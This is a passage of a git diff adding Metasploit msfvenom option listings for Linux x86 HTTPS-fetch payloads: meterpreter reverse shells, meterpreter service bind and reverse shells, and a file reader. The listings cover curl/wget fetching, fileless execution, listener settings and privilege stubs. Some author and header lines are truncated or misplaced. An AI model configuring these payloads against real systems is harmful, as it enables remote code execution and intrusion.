size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x86/meterpreter_reverse_http: +========================= + +nt_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME joUpgmbF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_https.txt new file mode 100644 index 0000000..7427d6e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x86/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x86/meterpreter_reverse_https: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OfrUNrBi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c4191a1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x86/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x86/meterpreter_reverse_tcp: +========================= + +rent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MxocCAOef no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..277fbc4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_bind_tcp.txt @@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Meterpreter Service, Bind TCP + Module: payload/cmd/linux/https/x86/metsvc_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NJariKgTawY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..a260222 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_reverse_tcp.txt @@ -0,0 +1,100 @@ + + Name: HTTPS Fetch, Linux Meterpreter Service, Reverse TCP Inline + Module: payload/cmd/linux/https/x86/metsvc_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/https/x86/metsvc_reverse_tcp: +========================= + + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CVWKereJy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-read_file.txt b/msfvenom/payload_options/cmd-linux-https-x86-read_file.txt new file mode 100644 index 0000000..adec93f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-read_file.txt @@ -0,0 +1,81 @@ + + Name: HTTPS Fetch, Linux Read File + Module: payload/cmd/linux/https/x86/read_file + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FD 1 yes The file descriptor to write output to +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PATH yes The file path to read + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kkoxgRfIJmAi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git 